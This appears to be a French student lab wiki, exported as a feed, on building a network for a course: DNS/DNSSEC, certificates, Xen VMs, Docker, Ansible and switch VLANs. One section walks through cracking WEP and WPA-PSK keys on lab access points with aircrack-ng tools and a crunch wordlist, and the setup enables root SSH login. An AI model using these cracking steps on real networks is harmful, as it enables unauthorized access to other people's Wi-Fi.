 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52006</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52006"/>
				<updated>2020-01-05T15:00:54Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Création des VLANs */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activé une connexion ssh en créant des clé RSA et une configuration VTY mais le commutateur n'a pas l'air à première vue d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet que nous avons décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
